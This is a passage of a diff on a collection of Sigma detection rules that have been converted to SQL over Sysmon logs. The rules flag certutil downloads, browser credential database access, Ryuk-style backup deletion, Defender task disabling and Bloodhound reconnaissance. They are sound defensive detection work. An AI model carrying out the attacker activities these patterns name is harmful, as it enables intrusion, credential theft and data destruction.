(ParentCommandLine LIKE '%\\\\svchost.exe%' ESCAPE '\\' AND ParentCommandLine LIKE '%termsvcs%' ESCAPE '\\') AND NOT (((Image LIKE '%\\\\rdpclip.exe' ESCAPE '\\' OR Image LIKE '%:\\\\Windows\\\\System32\\\\csrss.exe' ESCAPE '\\' OR Image LIKE '%:\\\\Windows\\\\System32\\\\wininit.exe' ESCAPE '\\' OR Image LIKE '%:\\\\Windows\\\\System32\\\\winlogon.exe' ESCAPE '\\')) OR (Image = '')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/Change%' ESCAPE '\\' AND CommandLine LIKE '%/TN%' ESCAPE '\\' AND CommandLine LIKE '%/disable%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\Windows\\\\SystemRestore\\\\SR%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Windows Defender\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\BitLocker%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\WindowsBackup\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\WindowsUpdate\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\UpdateOrchestrator\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\ExploitGuard%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_svchost_termserv_proc_spawn.yml" + "filename": "proc_creation_win_schtasks_disable.yml" }, { - "title": "Application Whitelisting Bypass via Dnx.exe", - "id": "81ebd28b-9607-4478-bf06-974ed9d53ed7", + "title": "Explorer NOUACCHECK Flag", + "id": "534f2ef7-e8a2-4433-816d-c91bccde289b", "status": "test", - "description": "Execute C# code located in the consoleapp folder", - "author": "Beyu Denis, oscd.community", + "description": "Detects suspicious starts of explorer.exe that use the /NOUACCHECK flag that allows to run all sub processes of that newly started explorer.exe without any UAC checks", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1218", - "attack.t1027.004" + "attack.t1548.002" ], "falsepositives": [ - "Legitimate use of dnx.exe by legitimate user" + "Domain Controller User Logon", + "Unknown how many legitimate software products use that method" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\dnx.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\explorer.exe' ESCAPE '\\' AND CommandLine LIKE '%/NOUACCHECK%' ESCAPE '\\') AND NOT ((ParentCommandLine LIKE 'C:\\\\Windows\\\\system32\\\\svchost.exe -k netsvcs -p -s Schedule' ESCAPE '\\' OR ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_dnx.yml" + "filename": "proc_creation_win_explorer_nouaccheck.yml" }, { - "title": "Suspicious Extrac32 Execution", - "id": "aa8e035d-7be4-48d3-a944-102aec04400d", - "status": "experimental", - "description": "Download or Copy file with Extrac32", - "author": "frack113", + "title": "Potential SPN Enumeration Via Setspn.EXE", + "id": "1eeed653-dbc8-4187-ad0c-eeebb20e6599", + "status": "test", + "description": "Detects service principal name (SPN) enumeration used for Kerberoasting", + "author": "Markus Neis, keepwatch", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.credential_access", + "attack.t1558.003" ], "falsepositives": [ - "Unknown" + "Administration activity" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%extrac32.exe%' ESCAPE '\\' OR Image LIKE '%\\\\extrac32.exe' ESCAPE '\\' OR OriginalFileName = 'extrac32.exe') AND CommandLine LIKE '%.cab%' ESCAPE '\\' AND (CommandLine LIKE '%/C%' ESCAPE '\\' OR CommandLine LIKE '%/Y%' ESCAPE '\\' OR CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\setspn.exe' ESCAPE '\\' OR OriginalFileName = 'setspn.exe' OR (Description LIKE '%Query or reset the computer%' ESCAPE '\\' AND Description LIKE '%SPN attribute%' ESCAPE '\\')) AND CommandLine LIKE '%-q%' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_extrac32.yml" + "filename": "proc_creation_win_setspn_spn_enumeration.yml" }, { - "title": "Remote Access Tool - NetSupport Execution", - "id": "758ff488-18d5-4cbe-8ec4-02b6285a434f", + "title": "Potential Discovery Activity Via Dnscmd.EXE", + "id": "b6457d63-d2a2-4e29-859d-4e7affc153d1", "status": "experimental", - "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", - "author": "frack113", + "description": "Detects an attempt to leverage dnscmd.exe to enumerate the DNS zones of a domain. DNS zones used to host the DNS records for a particular domain.", + "author": "@gott_cyber", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.discovery", + "attack.execution", + "attack.t1543.003" ], "falsepositives": [ - "Legitimate use" + "Legitimate administration use" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Description = 'NetSupport Client Configurator' OR Product = 'NetSupport Remote Control' OR Company = 'NetSupport Ltd' OR OriginalFileName = 'PCICFGUI.EXE'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\dnscmd.exe' ESCAPE '\\' AND (CommandLine LIKE '%/enumrecords%' ESCAPE '\\' OR CommandLine LIKE '%/enumzones%' ESCAPE '\\' OR CommandLine LIKE '%/ZonePrint%' ESCAPE '\\' OR CommandLine LIKE '%/info%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_remote_access_tools_netsupport.yml" + "filename": "proc_creation_win_dnscmd_discovery.yml" }, { - "title": "Potential Process Injection Via Msra.EXE", - "id": "744a188b-0415-4792-896f-11ddb0588dbc", + "title": "Potential Defense Evasion Via Right-to-Left Override", + "id": "ad691d92-15f2-4181-9aa4-723c74f9ddc3", "status": "experimental", - "description": "Detects potential process injection via Microsoft Remote Asssistance (Msra.exe) by looking at suspicious child processes spawned from the aforementioned process. It has been a target used by many threat actors and used for discovery and persistence tactics", - "author": "Alexander McDonald", + "description": "Detects the presence of the \"u202+E\" character, which causes a terminal, browser, or operating system to render text in a right-to-left sequence.\nThis is used as an obfuscation and masquerading techniques.\n", + "author": "Micah Babinski, @micahbabinski", "tags": [ "attack.defense_evasion", - "attack.t1055" + "attack.t1036.002" ], "falsepositives": [ - "Legitimate use of Msra.exe" + "Commandlines that contains scriptures such as arabic or hebrew might make use of this character" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\msra.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%msra.exe' ESCAPE '\\' AND (Image LIKE '%\\\\arp.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\netstat.exe' ESCAPE '\\' OR Image LIKE '%\\\\nslookup.exe' ESCAPE '\\' OR Image LIKE '%\\\\route.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\whoami.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%‮%' ESCAPE '\\')" ], - "filename": "proc_creation_win_msra_process_injection.yml" + "filename": "proc_creation_win_susp_right_to_left_override.yml" }, { - "title": "Renamed Office Binary Execution", - "id": "0b0cd537-fc77-4e6e-a973-e53495c1083d", + "title": "Suspicious Csi.exe Usage", + "id": "40b95d31-1afc-469e-8d34-9a3a667d058e", "status": "experimental", - "description": "Detects the execution of a renamed office binary", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Csi.exe is a signed binary from Microsoft that comes with Visual Studio and provides C# interactive capabilities. It can be used to run C# code from a file passed as a parameter in command line. Early version of this utility provided with Microsoft “Roslyn” Community Technology Preview was named 'rcsi.exe'", + "author": "Konstantin Grishchenko, oscd.community", "tags": [ - "attack.defense_evasion" + "attack.execution", + "attack.t1072", + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Unknown" + "Legitimate usage by software developers" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName IN ('Excel.exe', 'MSACCESS.EXE', 'OneNote.exe', 'POWERPNT.EXE', 'WinWord.exe') OR Description IN ('Microsoft Access', 'Microsoft Excel', 'Microsoft OneNote', 'Microsoft PowerPoint', 'Microsoft Word')) AND NOT ((Image LIKE '%\\\\EXCEL.exe' ESCAPE '\\' OR Image LIKE '%\\\\MSACCESS.exe' ESCAPE '\\' OR Image LIKE '%\\\\ONENOTE.EXE' ESCAPE '\\' OR Image LIKE '%\\\\POWERPNT.EXE' ESCAPE '\\' OR Image LIKE '%\\\\WINWORD.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\csi.exe' ESCAPE '\\' OR Image LIKE '%\\\\rcsi.exe' ESCAPE '\\') OR OriginalFileName IN ('csi.exe', 'rcsi.exe')) AND Company = 'Microsoft Corporation')" ], - "filename": "proc_creation_win_renamed_office_processes.yml" + "filename": "proc_creation_win_csi_execution.yml" }, { - "title": "Suspicious File Downloaded From Direct IP Via Certutil.EXE", - "id": "13e6fe51-d478-4c7e-b0f2-6da9b400a829", - "status": "experimental", - "description": "Detects the execution of certutil with certain flags that allow the utility to download files from direct IPs.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Potential Ryuk Ransomware Activity", + "id": "c37510b8-2107-4b78-aa32-72f251e7a844", + "status": "stable", + "description": "Detects Ryuk ransomware activity", + "author": "Florian Roth (Nextron Systems), Vasiliy Burov, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027" + "attack.persistence", + "attack.t1547.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR OriginalFileName = 'CertUtil.exe') AND (CommandLine LIKE '%urlcache %' ESCAPE '\\' OR CommandLine LIKE '%verifyctl %' ESCAPE '\\') AND (CommandLine LIKE '%://1%' ESCAPE '\\' OR CommandLine LIKE '%://2%' ESCAPE '\\' OR CommandLine LIKE '%://3%' ESCAPE '\\' OR CommandLine LIKE '%://4%' ESCAPE '\\' OR CommandLine LIKE '%://5%' ESCAPE '\\' OR CommandLine LIKE '%://6%' ESCAPE '\\' OR CommandLine LIKE '%://7%' ESCAPE '\\' OR CommandLine LIKE '%://8%' ESCAPE '\\' OR CommandLine LIKE '%://9%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%://7-%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\users\\\\Public\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%del /s /f /q c:\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\*.bac%' ESCAPE '\\' AND CommandLine LIKE '%\\*.bak%' ESCAPE '\\' AND CommandLine LIKE '%\\*.bkf%' ESCAPE '\\') OR ((Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') AND CommandLine LIKE '% stop %' ESCAPE '\\' AND CommandLine LIKE '% /y%' ESCAPE '\\' AND (CommandLine LIKE '%samss%' ESCAPE '\\' OR CommandLine LIKE '%audioendpointbuilder%' ESCAPE '\\' OR CommandLine LIKE '%unistoresvc\\_%' ESCAPE '\\' OR CommandLine LIKE '%AcrSch2Svc%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_certutil_download_direct_ip.yml" + "filename": "proc_creation_win_malware_ryuk.yml" }, { - "title": "Local Groups Reconnaissance Via Wmic.EXE", - "id": "164eda96-11b2-430b-85ff-6a265c15bf32", - "status": "experimental", - "description": "Detects the execution of \"wmic\" with the \"group\" flag.\nAdversaries may attempt to find local system groups and permission settings.\nThe knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group.\nAdversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group.\n", - "author": "frack113", + "title": "Scheduled Task Creation", + "id": "92626ddd-662c-49e3-ac59-f6535f12d189", + "status": "test", + "description": "Detects the creation of scheduled tasks in user session", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1069.001" + "attack.execution", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1053.005", + "attack.s0111", + "car.2013-08-001" ], "falsepositives": [ - "Unknown" + "Administrative activity", + "Software installation" ], "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND CommandLine LIKE '% group%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '% /create %' ESCAPE '\\') AND NOT ((User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_wmic_recon_group.yml" + "filename": "proc_creation_win_schtasks_creation.yml" }, { - "title": "Suspicious Reg Add Open Command", - "id": "dd3ee8cc-f751-41c9-ba53-5a32ed47e563", - "status": "test", - "description": "Threat actors performed dumping of SAM, SECURITY and SYSTEM registry hives using DelegateExecute key", - "author": "frack113", + "title": "Set Suspicious Files as System Files Using Attrib.EXE", + "id": "efec536f-72e8-4656-8960-5e85d091345b", + "status": "experimental", + "description": "Detects the usage of attrib with the \"+s\" option to set scripts or executables located in suspicious locations as system files to hide them from users and make them unable to be deleted with simple rights. The rule limits the search to specific extensions and directories to avoid FPs\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003" + "attack.defense_evasion", + "attack.t1564.001" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%reg%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%hkcu\\\\software\\\\classes\\\\ms-settings\\\\shell\\\\open\\\\command%' ESCAPE '\\' AND CommandLine LIKE '%/ve %' ESCAPE '\\' AND CommandLine LIKE '%/d%' ESCAPE '\\') OR (CommandLine LIKE '%reg%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%hkcu\\\\software\\\\classes\\\\ms-settings\\\\shell\\\\open\\\\command%' ESCAPE '\\' AND CommandLine LIKE '%/v%' ESCAPE '\\' AND CommandLine LIKE '%DelegateExecute%' ESCAPE '\\') OR (CommandLine LIKE '%reg%' ESCAPE '\\' AND CommandLine LIKE '%delete%' ESCAPE '\\' AND CommandLine LIKE '%hkcu\\\\software\\\\classes\\\\ms-settings%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\attrib.exe' ESCAPE '\\' OR OriginalFileName = 'ATTRIB.EXE') AND CommandLine LIKE '% +s%' ESCAPE '\\' AND (CommandLine LIKE '% \\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%.bat%' ESCAPE '\\' OR CommandLine LIKE '%.dll%' ESCAPE '\\' OR CommandLine LIKE '%.exe%' ESCAPE '\\' OR CommandLine LIKE '%.hta%' ESCAPE '\\' OR CommandLine LIKE '%.ps1%' ESCAPE '\\' OR CommandLine LIKE '%.vbe%' ESCAPE '\\' OR CommandLine LIKE '%.vbs%' ESCAPE '\\')) AND NOT (CommandLine LIKE '%\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.exe%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_reg_open_command.yml" + "filename": "proc_creation_win_attrib_system_susp_paths.yml" }, { - "title": "Use of FSharp Interpreters", - "id": "b96b2031-7c17-4473-afe7-a30ce714db29", - "status": "experimental", - "description": "The FSharp Interpreters, FsiAnyCpu.exe and FSi.exe, can be used for AWL bypass and is listed in Microsoft recommended block rules.", - "author": "Christopher Peacock @SecurePeacock, SCYTHE @scythe_io", + "title": "HackTool - Bloodhound/Sharphound Execution", + "id": "f376c8a7-a2d0-4ddc-aa0c-16c17236d962", + "status": "test", + "description": "Detects command line parameters used by Bloodhound and Sharphound hack tools", + "author": "Florian Roth (Nextron Systems)", "tags": [ + "attack.discovery", + "attack.t1087.001", + "attack.t1087.002", + "attack.t1482", + "attack.t1069.001", + "attack.t1069.002", "attack.execution", - "attack.t1059" + "attack.t1059.001" ], "falsepositives": [ - "Legitimate use by a software developer." + "Other programs that use these command line option and accepts an 'All' parameter" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\fsianycpu.exe' ESCAPE '\\' OR OriginalFileName = 'fsianycpu.exe' OR Image LIKE '%\\\\fsi.exe' ESCAPE '\\' OR OriginalFileName = 'fsi.exe'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Product LIKE '%SharpHound%' ESCAPE '\\' OR Description LIKE '%SharpHound%' ESCAPE '\\' OR (Company LIKE '%SpecterOps%' ESCAPE '\\' OR Company LIKE '%evil corp%' ESCAPE '\\') OR (Image LIKE '%\\\\Bloodhound.exe%' ESCAPE '\\' OR Image LIKE '%\\\\SharpHound.exe%' ESCAPE '\\')) OR (CommandLine LIKE '% -CollectionMethod All %' ESCAPE '\\' OR CommandLine LIKE '% --CollectionMethods Session %' ESCAPE '\\' OR CommandLine LIKE '% --Loop --Loopduration %' ESCAPE '\\' OR CommandLine LIKE '% --PortScanTimeout %' ESCAPE '\\' OR CommandLine LIKE '%.exe -c All -d %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Bloodhound%' ESCAPE '\\' OR CommandLine LIKE '%Get-BloodHoundData%' ESCAPE '\\') OR (CommandLine LIKE '% -JsonFolder %' ESCAPE '\\' AND CommandLine LIKE '% -ZipFileName %' ESCAPE '\\') OR (CommandLine LIKE '% DCOnly %' ESCAPE '\\' AND CommandLine LIKE '% --NoSaveCache %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_fsharp_interpreters.yml" + "filename": "proc_creation_win_hktl_bloodhound_sharphound.yml" }, { - "title": "Curl.EXE Execution", - "id": "bbeaed61-1990-4773-bf57-b81dbad7db2d", + "title": "Suspicious File Characteristics Due to Missing Fields", + "id": "9637e8a5-7131-4f7f-bdc7-2b05d8670c43", "status": "test", - "description": "Detects a curl process start on Windows, which could indicates a file download from a remote location or a simple web request to a remote server", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects Executables in the Downloads folder without FileVersion,Description,Product,Company likely created with py2exe", + "author": "Markus Neis, Sander Wiebing", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.execution", + "attack.t1059.006" ], "falsepositives": [ - "Scripts created by developers and admins", - "Administrative activity" + "Unknown" ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\curl.exe' ESCAPE '\\' OR Product = 'The curl executable'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Description LIKE '\\?' ESCAPE '\\' AND FileVersion LIKE '\\?' ESCAPE '\\') OR (Description LIKE '\\?' ESCAPE '\\' AND Product LIKE '\\?' ESCAPE '\\')) OR (Description LIKE '\\?' ESCAPE '\\' AND Company LIKE '\\?' ESCAPE '\\')) AND Image LIKE '%\\\\Downloads\\\\%' ESCAPE '\\')" ], - "filename": "proc_creation_win_curl_execution.yml" + "filename": "proc_creation_win_susp_file_characteristics.yml" }, { - "title": "Potential CVE-2022-26809 Exploitation Attempt", - "id": "a7cd7306-df8b-4398-b711-6f3e4935cf16", - "status": "experimental", - "description": "Detects suspicious remote procedure call (RPC) service anomalies based on the spawned sub processes (long shot to detect the exploitation of vulnerabilities like CVE-2022-26809)", - "author": "Florian Roth (Nextron Systems)", + "title": "Remote Code Execute via Winrm.vbs", + "id": "9df0dd3a-1a5c-47e3-a2bc-30ed177646a0", + "status": "test", + "description": "Detects an attempt to execute code or create service on remote host via winrm.vbs.", + "author": "Julia Fomina, oscd.community", "tags": [ - "attack.initial_access", - "attack.t1190", - "attack.execution", - "attack.t1569.002" + "attack.defense_evasion", + "attack.t1216" ], "falsepositives": [ - "Unknown", - "Some cases in which the service spawned a werfault.exe process" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%-k RPCSS%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR OriginalFileName = 'cscript.exe') AND (CommandLine LIKE '%winrm%' ESCAPE '\\' AND CommandLine LIKE '%invoke Create wmicimv2/Win32\\_%' ESCAPE '\\' AND CommandLine LIKE '%-r:http%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_exploit_cve_2022_26809_rpcss_child_process_anomaly.yml" + "filename": "proc_creation_win_winrm_execution_via_scripting_api_winrm_vbs.yml" }, { - "title": "SQLite Chromium Profile Data DB Access", - "id": "24c77512-782b-448a-8950-eddb0785fc71", + "title": "Suspicious Msbuild Execution By Uncommon Parent Process", + "id": "33be4333-2c6b-44f4-ae28-102cdbde0a31", "status": "experimental", - "description": "Detect usage of the \"sqlite\" binary to query databases in Chromium-based browsers for potential data stealing.", - "author": "TropChaud", + "description": "Detects suspicious execution of 'Msbuild.exe' by a uncommon parent process", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1539", - "attack.t1555.003", - "attack.collection", - "attack.t1005" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Product = 'SQLite' OR (Image LIKE '%\\\\sqlite.exe' ESCAPE '\\' OR Image LIKE '%\\\\sqlite3.exe' ESCAPE '\\')) AND (CommandLine LIKE '%\\\\User Data\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Opera Software\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ChromiumViewer\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%Login Data%' ESCAPE '\\' OR CommandLine LIKE '%Cookies%' ESCAPE '\\' OR CommandLine LIKE '%Web Data%' ESCAPE '\\' OR CommandLine LIKE '%History%' ESCAPE '\\' OR CommandLine LIKE '%Bookmarks%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\MSBuild.exe' ESCAPE '\\' OR OriginalFileName = 'MSBuild.exe') AND NOT ((ParentImage LIKE '%\\\\devenv.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\cmd.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\python.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\explorer.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\nuget.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_sqlite_chromium_profile_data.yml" + "filename": "proc_creation_win_msbuild_susp_parent_process.yml" }, { - "title": "Suspicious Git Clone", - "id": "aef9d1f1-7396-4e92-a927-4567c7a495c1", - "status": "experimental", - "description": "Detects execution of \"git\" in order to clone a remote repository that contain suspicious keywords which might be suspicious", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious Execution of Shutdown", + "id": "34ebb878-1b15-4895-b352-ca2eeb99b274", + "status": "test", + "description": "Use of the commandline to shutdown or reboot windows", + "author": "frack113", "tags": [ - "attack.reconnaissance", - "attack.t1593.003" + "attack.impact", + "attack.t1529" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\git.exe' ESCAPE '\\' OR Image LIKE '%\\\\git-remote-https.exe' ESCAPE '\\') OR OriginalFileName = 'git.exe') AND (CommandLine LIKE '% clone %' ESCAPE '\\' OR CommandLine LIKE '%git-remote-https %' ESCAPE '\\') AND (CommandLine LIKE '%exploit%' ESCAPE '\\' OR CommandLine LIKE '%Vulns%' ESCAPE '\\' OR CommandLine LIKE '%vulnerability%' ESCAPE '\\' OR CommandLine LIKE '%RemoteCodeExecution%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-%' ESCAPE '\\' OR CommandLine LIKE '%CVE-%' ESCAPE '\\' OR CommandLine LIKE '%poc-%' ESCAPE '\\' OR CommandLine LIKE '%ProofOfConcept%' ESCAPE '\\' OR CommandLine LIKE '%proxyshell%' ESCAPE '\\' OR CommandLine LIKE '%log4shell%' ESCAPE '\\' OR CommandLine LIKE '%eternalblue%' ESCAPE '\\' OR CommandLine LIKE '%eternal-blue%' ESCAPE '\\' OR CommandLine LIKE '%MS17-%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\shutdown.exe' ESCAPE '\\' AND (CommandLine LIKE '%/r %' ESCAPE '\\' OR CommandLine LIKE '%/s %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_git_susp_clone.yml" + "filename": "proc_creation_win_shutdown_execution.yml" }, { - "title": "Suspicious Tasklist Discovery Command", - "id": "63332011-f057-496c-ad8d-d2b6afb27f96", - "status": "test", - "description": "Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network", - "author": "frack113", + "title": "Suspicious Reconnaissance Activity Using Get-LocalGroupMember Cmdlet", + "id": "c8a180d6-47a3-4345-a609-53f9c3d834fc", + "status": "experimental", + "description": "Detects suspicious reconnaissance command line activity on Windows systems using the PowerShell Get-LocalGroupMember Cmdlet", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.discovery", - "attack.t1057" + "attack.t1087.001" ], "falsepositives": [ - "Administrator, hotline ask to user" + "Administrative activity" ], - "level": "informational", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%tasklist%' ESCAPE '\\' OR Image LIKE '%\\\\tasklist.exe' ESCAPE '\\' OR OriginalFileName = 'tasklist.exe'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%Get-LocalGroupMember %' ESCAPE '\\' AND (CommandLine LIKE '%domain admins%' ESCAPE '\\' OR CommandLine LIKE '% administrator%' ESCAPE '\\' OR CommandLine LIKE '% administrateur%' ESCAPE '\\' OR CommandLine LIKE '%enterprise admins%' ESCAPE '\\' OR CommandLine LIKE '%Exchange Trusted Subsystem%' ESCAPE '\\' OR CommandLine LIKE '%Remote Desktop Users%' ESCAPE '\\' OR CommandLine LIKE '%Utilisateurs du Bureau à distance%' ESCAPE '\\' OR CommandLine LIKE '%Usuarios de escritorio remoto%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_tasklist_basic_execution.yml" + "filename": "proc_creation_win_powershell_get_localgroup_member_recon.yml" }, { - "title": "Potential Powershell ReverseShell Connection", - "id": 